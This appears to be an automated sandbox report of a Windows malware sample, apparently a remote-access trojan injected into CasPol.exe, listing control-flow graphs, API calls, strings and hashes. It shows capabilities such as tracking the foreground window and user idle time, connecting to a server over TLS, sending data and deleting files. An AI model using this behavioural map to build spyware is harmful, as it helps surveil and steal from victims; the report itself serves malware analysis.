                                                                                                                                                                          control_flow_graph 1009 414dc1-414dfd 1010 414e03-414e18 GetSystemDirectoryA 1009->1010 1011 414f18-414f23 1009->1011 1012 414f0e 1010->1012 1013 414e1e-414e6a call 441a8e call 441ae8 LoadLibraryA 1010->1013 1012->1011 1018 414e81-414ebb call 441a8e call 441ae8 LoadLibraryA 1013->1018 1019 414e6c-414e76 GetProcAddress 1013->1019 1032 414f0a-414f0d 1018->1032 1033 414ebd-414ec7 GetProcAddress 1018->1033 1020 414e78-414e7b FreeLibrary 1019->1020 1021 414e7d-414e7f 1019->1021 1020->1021 1021->1018 1023 414ed2 1021->1023 1025 414ed4-414ee5 GetProcAddress 1023->1025 1027 414ee7-414eeb 1025->1027 1028 414eef-414ef2 FreeLibrary 1025->1028 1027->1025 1030 414eed 1027->1030 1031 414ef4-414ef6 1028->1031 1030->1031 1031->1032 1034 414ef8-414f08 1031->1034 1032->1012 1035 414ec9-414ecc FreeLibrary 1033->1035 1036 414ece-414ed0 1033->1036 1034->1032 1034->1034 1035->1036 1036->1023 1036->1032
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                                                                          • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                                                                          • API String ID: 2490988753-744132762
                                                                                                                                                                          • Opcode ID: 93ac1047b93552b97dd98974212ca4d4f14522e3aac142c7c555de1a9c5e5d12
                                                                                                                                                                          • Instruction ID: 3afff981d8ce70f6205f85204df1f21ec1f12b20cff6a054e3a0857f0929e507
                                                                                                                                                                          • Opcode Fuzzy Hash: 93ac1047b93552b97dd98974212ca4d4f14522e3aac142c7c555de1a9c5e5d12
                                                                                                                                                                          • Instruction Fuzzy Hash: 3231C2B2906315ABD7209F65CC84EDF76DCAB84754F004A2AF984A3211D738D985CBAE

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1037 412aef-412b38 GetModuleFileNameW call 4020df * 3 1044 412b3a-412bc4 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 1037->1044 1069 412bc6-412c56 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1044->1069 1092 412c66 1069->1092 1093 412c58-412c60 Sleep 1069->1093 1094 412c68-412cf8 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1092->1094 1093->1069 1093->1092 1117 412d08 1094->1117 1118 412cfa-412d02 Sleep 1094->1118 1119 412d0a-412d9a call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1117->1119 1118->1094 1118->1117 1142 412daa-412dcf 1119->1142 1143 412d9c-412da4 Sleep 1119->1143 1144 412dd3-412def call 401f04 call 41c516 1142->1144 1143->1119 1143->1142 1149 412df1-412e00 call 401f04 DeleteFileW 1144->1149 1150 412e06-412e22 call 401f04 call 41c516 1144->1150 1149->1150 1157 412e24-412e3d call 401f04 DeleteFileW 1150->1157 1158 412e3f 1150->1158 1159 412e43-412e5f call 401f04 call 41c516 1157->1159 1158->1159 1166 412e61-412e73 call 401f04 DeleteFileW 1159->1166 1167 412e79-412e7b 1159->1167 1166->1167 1169 412e88-412e93 Sleep 1167->1169 1170 412e7d-412e7f 1167->1170 1169->1144 1173 412e99-412eab call 406b63 1169->1173 1170->1169 1172 412e81-412e86 1170->1172 1172->1169 1172->1173 1176 412f01-412f20 call 401f09 * 3 1173->1176 1177 412ead-412ebb call 406b63 1173->1177 1188 412f25-412f5e call 40b93f call 401f04 call 4020f6 call 413268 1176->1188 1177->1176 1183 412ebd-412ecb call 406b63 1177->1183 1183->1176 1189 412ecd-412ef9 Sleep call 401f09 * 3 1183->1189 1204 412f63-412f89 call 401f09 call 405b05 1188->1204 1189->1044 1203 412eff 1189->1203 1203->1188 1209 4130e3-4131dc call 41bdaf call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 call 401fd8 * 7 1204->1209 1210 412f8f-4130de call 41bdaf call 41bc1f call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1204->1210 1279 4131e0-413267 call 401fd8 call 401f09 call 401fd8 * 9 1209->1279 1210->1279
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                                                                                                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,7570D4DF,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,00475300), ref: 0041BA30
                                                                                                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                                                                                          • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                                                                                                                          • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                                                                                                                          • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                                                                                                                          • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                                                                          • String ID: /stext "$@TG$@TG
                                                                                                                                                                          • API String ID: 1223786279-723413999
                                                                                                                                                                          • Opcode ID: dbc1b28789681a9ee1592237c9aaecbcec795c68be0e2e7071a14699362cc614
                                                                                                                                                                          • Instruction ID: 54c64e465a66050ec466d83b34d0c9889d7f3cdaa7358c1e9e14d2467042f0e2
                                                                                                                                                                          • Opcode Fuzzy Hash: dbc1b28789681a9ee1592237c9aaecbcec795c68be0e2e7071a14699362cc614
                                                                                                                                                                          • Instruction Fuzzy Hash: 5B0268315083414AC325FB62D891AEFB3E5AFD0348F50483FF58A971E2EF785A49C65A

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1314 4048c8-4048e8 connect 1315 404a1b-404a1f 1314->1315 1316 4048ee-4048f1 1314->1316 1319 404a21-404a2f WSAGetLastError 1315->1319 1320 404a97 1315->1320 1317 404a17-404a19 1316->1317 1318 4048f7-4048fa 1316->1318 1321 404a99-404a9e 1317->1321 1322 404926-404930 call 420cf1 1318->1322 1323 4048fc-404923 call 40531e call 402093 call 41b580 1318->1323 1319->1320 1324 404a31-404a34 1319->1324 1320->1321 1336 404941-40494e call 420f20 1322->1336 1337 404932-40493c 1322->1337 1323->1322 1326 404a71-404a76 1324->1326 1327 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1324->1327 1329 404a7b-404a94 call 402093 * 2 call 41b580 1326->1329 1327->1320 1329->1320 1346 404950-404973 call 402093 * 2 call 41b580 1336->1346 1347 404987-404992 call 421ad1 1336->1347 1337->1329 1376 404976-404982 call 420d31 1346->1376 1360 4049c4-4049d1 call 420e97 1347->1360 1361 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1347->1361 1373 4049d3-4049f6 call 402093 * 2 call 41b580 1360->1373 1374 4049f9-404a14 CreateEventW * 2 1360->1374 1361->1376 1373->1374 1374->1317 1376->1320
                                                                                                                                                                          APIs
                                                                                                                                                                          • connect.WS2_32(FFFFFFFF,021D4960,00000010), ref: 004048E0
                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                                                                                                          • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                                          • API String ID: 994465650-2151626615
                                                                                                                                                                          • Opcode ID: c79575128297767161c001f09357deb0abd53bb53981a43f107bd2a8a47e6bf6
                                                                                                                                                                          • Instruction ID: d7ad8a6a5323ad03425d5def7d05b30a9c8ce31cd4ccd690c712fe6c843f15aa
                                                                                                                                                                          • Opcode Fuzzy Hash: c79575128297767161c001f09357deb0abd53bb53981a43f107bd2a8a47e6bf6
                                                                                                                                                                          • Instruction Fuzzy Hash: AD41E8B575060277C61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                                                                                                          • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3658366068-0
                                                                                                                                                                          • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                                                                                                          • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                                                                                                                          • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                                                                                                          • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0040AD84
                                                                                                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                                                                                                                          • GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040ADC1
                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                                                                                                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                                                          • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                                                                          • API String ID: 911427763-3954389425
                                                                                                                                                                          • Opcode ID: 54061860b470e88efe9c51004f6368ba07ee2c981330a977327270d22d87fefb
                                                                                                                                                                          • Instruction ID: 1462e2e3b317a3feaa81e481452c264ee2198f2d95b6ea563507fc8e19ff55dc
                                                                                                                                                                          • Opcode Fuzzy Hash: 54061860b470e88efe9c51004f6368ba07ee2c981330a977327270d22d87fefb
                                                                                                                                                                          • Instruction Fuzzy Hash: 7F51E1716043419BC714FB62D846AAE7795AF84308F10093FF546A22E2EF7C9D44C69F

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1486 40da6f-40da94 call 401f86 1489 40da9a 1486->1489 1490 40dbbe-40dc56 call 401f04 GetLongPathNameW call 40417e * 2 call 40de0c call 402fa5 * 2 call 401f09 * 5 1486->1490 1492 40dae0-40dae7 call 41c048 1489->1492 1493 40daa1-40daa6 1489->1493 1494 40db93-40db98 1489->1494 1495 40dad6-40dadb 1489->1495 1496 40dba9 1489->1496 1497 40db9a-40dba7 call 43c11f 1489->1497 1498 40daab-40dab9 call 41b645 call 401f13 1489->1498 1499 40dacc-40dad1 1489->1499 1500 40db8c-40db91 1489->1500 1512 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1492->1512 1513 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1492->1513 1502 40dbae-40dbb3 call 43c11f 1493->1502 1494->1502 1495->1502 1496->1502 1497->1496 1514 40dbb4-40dbb9 call 409092 1497->1514 1520 40dabe 1498->1520 1499->1502 1500->1502 1502->1514 1525 40dac2-40dac7 call 401f09 1512->1525 1513->1520 1514->1490 1520->1525 1525->1490
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040DBD5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LongNamePath
                                                                                                                                                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                                          • API String ID: 82841172-425784914
                                                                                                                                                                          • Opcode ID: e449d481ed2360d16fb1fd9d50703ad25ac73fcf6fdc62031a2b222bc8cf01a2
                                                                                                                                                                          • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                                                                                                                          • Opcode Fuzzy Hash: e449d481ed2360d16fb1fd9d50703ad25ac73fcf6fdc62031a2b222bc8cf01a2
                                                                                                                                                                          • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                                                                                                                            • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                                                                                                            • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                                                                                            • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                                                                                            • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                                                                                                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                                          • String ID: h]v$h}v
                                                                                                                                                                          • API String ID: 3795512280-2849284857
                                                                                                                                                                          • Opcode ID: 2119f11f23061c4e484226989141e131a621328cb22bd730a221ead51676d936
                                                                                                                                                                          • Instruction ID: b4a8632174cffc949347442128fe52ffedc09667b4c22c284aa084888e76bad6
                                                                                                                                                                          • Opcode Fuzzy Hash: 2119f11f23061c4e484226989141e131a621328cb22bd730a221ead51676d936
                                                                                                                                                                          • Instruction Fuzzy Hash: AC518D716043015ACB15BB72C866ABE77AA9F80349F00483FF642B71E2DF7C9D09865E

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1666 41b354-41b3ab call 41c048 call 4135e1 call 401fe2 call 401fd8 call 406b1c 1677 41b3ad-41b3d8 call 4135e1 call 401fab StrToIntA 1666->1677 1678 41b3ee-41b3f7 1666->1678 1688 41b3e6-41b3e9 call 401fd8 1677->1688 1689 41b3da-41b3e3 call 41cffa 1677->1689 1679 41b400 1678->1679 1680 41b3f9-41b3fe 1678->1680 1682 41b405-41b410 call 40537d 1679->1682 1680->1682 1688->1678 1689->1688
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                                                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                                                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                                                                                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                                                                          • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                                                                          • String ID: (32 bit)$ (64 bit)$@ev$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$h}v
                                                                                                                                                                          • API String ID: 782494840-3077113585
                                                                                                                                                                          • Opcode ID: 7f4ed57b863d06eeb4683fbf9071729266cb2741295463b88aaa2d13acb4e1f0
                                                                                                                                                                          • Instruction ID: 99e2d84e4b8fa31c947f893a9fcbf762d6d1118dcb79bce5eaccee633664c5dc
                                                                                                                                                                          • Opcode Fuzzy Hash: 7f4ed57b863d06eeb4683fbf9071729266cb2741295463b88aaa2d13acb4e1f0
                                                                                                                                                                          • Instruction Fuzzy Hash: 0311C47064414926C700F7659C97BFF76198B80304F94453BF806A71D3FB6C598683EE

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1710 44acc9-44ace2 1711 44ace4-44acf4 call 4467e6 1710->1711 1712 44acf8-44acfd 1710->1712 1711->1712 1722 44acf6 1711->1722 1713 44acff-44ad07 1712->1713 1714 44ad0a-44ad2e MultiByteToWideChar 1712->1714 1713->1714 1716 44ad34-44ad40 1714->1716 1717 44aec1-44aed4 call 43502b 1714->1717 1719 44ad94 1716->1719 1720 44ad42-44ad53 1716->1720 1726 44ad96-44ad98 1719->1726 1723 44ad55-44ad64 call 457210 1720->1723 1724 44ad72-44ad83 call 4461b8 1720->1724 1722->1712 1727 44aeb6 1723->1727 1737 44ad6a-44ad70 1723->1737 1724->1727 1738 44ad89 1724->1738 1726->1727 1728 44ad9e-44adb1 MultiByteToWideChar 1726->1728 1732 44aeb8-44aebf call 435ecd 1727->1732 1728->1727 1731 44adb7-44adc9 call 448c33 1728->1731 1739 44adce-44add2 1731->1739 1732->1717 1741 44ad8f-44ad92 1737->1741 1738->1741 1739->1727 1742 44add8-44addf 1739->1742 1741->1726 1743 44ade1-44ade6 1742->1743 1744 44ae19-44ae25 1742->1744 1743->1732 1745 44adec-44adee 1743->1745 1746 44ae27-44ae38 1744->1746 1747 44ae71 1744->1747 1745->1727 1748 44adf4-44ae0e call 448c33 1745->1748 1750 44ae53-44ae64 call 4461b8 1746->1750 1751 44ae3a-44ae49 call 457210 1746->1751 1749 44ae73-44ae75 1747->1749 1748->1732 1765 44ae14 1748->1765 1754 44ae77-44ae90 call 448c33 1749->1754 1755 44aeaf-44aeb5 call 435ecd 1749->1755 1750->1755 1764 44ae66 1750->1764 1751->1755 1763 44ae4b-44ae51 1751->1763 1754->1755 1768 44ae92-44ae99 1754->1768 1755->1727 1767 44ae6c-44ae6f 1763->1767 1764->1767 1765->1727 1767->1749 1769 44aed5-44aedb 1768->1769 1770 44ae9b-44ae9c 1768->1770 1771 44ae9d-44aead WideCharToMultiByte 1769->1771 1770->1771 1771->1755 1772 44aedd-44aee4 call 435ecd 1771->1772 1772->1732
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                                                                                                                          • __freea.LIBCMT ref: 0044AEB0
                                                                                                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                          • __freea.LIBCMT ref: 0044AEB9
                                                                                                                                                                          • __freea.LIBCMT ref: 0044AEDE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3864826663-0
                                                                                                                                                                          • Opcode ID: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                                                                                                                                          • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                                                                                                                          • Opcode Fuzzy Hash: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
